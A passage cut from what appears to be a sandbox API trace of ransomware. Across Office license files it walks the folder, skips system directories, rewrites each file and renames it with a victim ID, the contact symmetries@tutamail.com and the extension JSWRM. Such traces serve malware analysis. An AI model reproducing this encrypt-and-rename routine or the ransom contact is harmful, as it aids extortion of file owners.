CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_retail-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.827] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=21604) returned 1 [0103.827] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5460) returned 0x24c1d0 [0103.828] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5460, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5460, lpOverlapped=0x0) returned 1 [0103.831] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.831] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5460, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5460, lpOverlapped=0x0) returned 1 [0103.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.831] CloseHandle (hObject=0x45c) returned 1 [0103.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0103.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0103.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0103.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0103.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0103.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0103.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.832] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_retail-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Retail-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_retail-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0103.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0103.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0103.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0103.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0103.833] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4a97702, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4a97702, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4b56390, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d54, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeStudentR_Retail-ul-oob.xrm-ms", cAlternateFileName="HO08B3~1.XRM")) returned 1 [0103.833] lstrcmpiW (lpString1="HomeStudentR_Retail-ul-oob.xrm-ms", lpString2=".") returned 1 [0103.833] lstrcmpiW (lpString1="HomeStudentR_Retail-ul-oob.xrm-ms", lpString2="..") returned 1 [0103.833] lstrcmpiW (lpString1="HomeStudentR_Retail-ul-oob.xrm-ms", lpString2="...") returned 1 [0103.833] lstrcmpiW (lpString1="HomeStudentR_Retail-ul-oob.xrm-ms", lpString2="windows") returned -1 [0103.833] lstrcmpiW (lpString1="HomeStudentR_Retail-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0103.833] lstrcmpiW (lpString1="HomeStudentR_Retail-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0103.833] lstrcmpiW (lpString1="HomeStudentR_Retail-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0103.833] lstrcmpiW (lpString1="HomeStudentR_Retail-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.833] lstrcmpiW (lpString1="HomeStudentR_Retail-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0103.833] lstrcmpiW (lpString1="HomeStudentR_Retail-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0103.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0103.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Retail-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0103.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Retail-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0103.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0103.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0103.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Retail-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0103.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Retail-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0103.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0103.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0103.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0103.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0103.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_retail-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.834] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11604) returned 1 [0103.834] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0103.834] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0103.836] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.836] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0103.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.836] CloseHandle (hObject=0x45c) returned 1 [0103.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0103.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0103.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0103.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0103.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0103.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0103.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0103.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0103.837] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_retail-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Retail-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_retail-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0103.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0103.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0103.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.838] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe49664a2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe49664a2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4a25005, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ded, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeStudentR_Retail-ul-phn.xrm-ms", cAlternateFileName="HO75FD~1.XRM")) returned 1 [0103.838] lstrcmpiW (lpString1="HomeStudentR_Retail-ul-phn.xrm-ms", lpString2=".") returned 1 [0103.838] lstrcmpiW (lpString1="HomeStudentR_Retail-ul-phn.xrm-ms", lpString2="..") returned 1 [0103.838] lstrcmpiW (lpString1="HomeStudentR_Retail-ul-phn.xrm-ms", lpString2="...") returned 1 [0103.838] lstrcmpiW (lpString1="HomeStudentR_Retail-ul-phn.xrm-ms", lpString2="windows") returned -1 [0103.838] lstrcmpiW (lpString1="HomeStudentR_Retail-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0103.838] lstrcmpiW (lpString1="HomeStudentR_Retail-ul-phn.xrm-ms", lpString2="perflogs") returned -1 [0103.838] lstrcmpiW (lpString1="HomeStudentR_Retail-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0103.838] lstrcmpiW (lpString1="HomeStudentR_Retail-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.838] lstrcmpiW (lpString1="HomeStudentR_Retail-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0103.838] lstrcmpiW (lpString1="HomeStudentR_Retail-ul-phn.xrm-ms", lpString2="msocache") returned -1 [0103.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0103.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Retail-ul-phn.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0103.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Retail-ul-phn.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0103.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0103.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0103.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Retail-ul-phn.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0103.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0103.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Retail-ul-phn.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d298, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0103.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0103.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0103.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0103.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0103.839] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_retail-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.839] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19949) returned 1 [0103.839] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0103.839] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0103.842] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.842] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0103.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.843] CloseHandle (hObject=0x45c) returned 1 [0103.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0103.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0103.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0103.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0103.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0103.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0103.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.843] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_retail-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Retail-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_retail-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0103.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0103.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0103.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0103.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.844] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe49401ca, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe49401ca, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe49fedb3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b9b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeStudentR_Trial-pl.xrm-ms", cAlternateFileName="HOD8E4~1.XRM")) returned 1 [0103.844] lstrcmpiW (lpString1="HomeStudentR_Trial-pl.xrm-ms", lpString2=".") returned 1 [0103.844] lstrcmpiW (lpString1="HomeStudentR_Trial-pl.xrm-ms", lpString2="..") returned 1 [0103.844] lstrcmpiW (lpString1="HomeStudentR_Trial-pl.xrm-ms", lpString2="...") returned 1 [0103.844] lstrcmpiW (lpString1="HomeStudentR_Trial-pl.xrm-ms", lpString2="windows") returned -1 [0103.844] lstrcmpiW (lpString1="HomeStudentR_Trial-pl.xrm-ms", lpString2="recovery") returned -1 [0103.844] lstrcmpiW (lpString1="HomeStudentR_Trial-pl.xrm-ms", lpString2="perflogs") returned -1 [0103.844] lstrcmpiW (lpString1="HomeStudentR_Trial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0103.844] lstrcmpiW (lpString1="HomeStudentR_Trial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.844] lstrcmpiW (lpString1="HomeStudentR_Trial-pl.xrm-ms", lpString2="system volume information") returned -1 [0103.844] lstrcmpiW (lpString1="HomeStudentR_Trial-pl.xrm-ms", lpString2="msocache") returned -1 [0103.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0103.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Trial-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0103.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0103.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Trial-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x240f48, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0103.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0103.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0103.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Trial-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0103.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0103.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Trial-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241358, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0103.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0103.844] RtlAllocateHeap 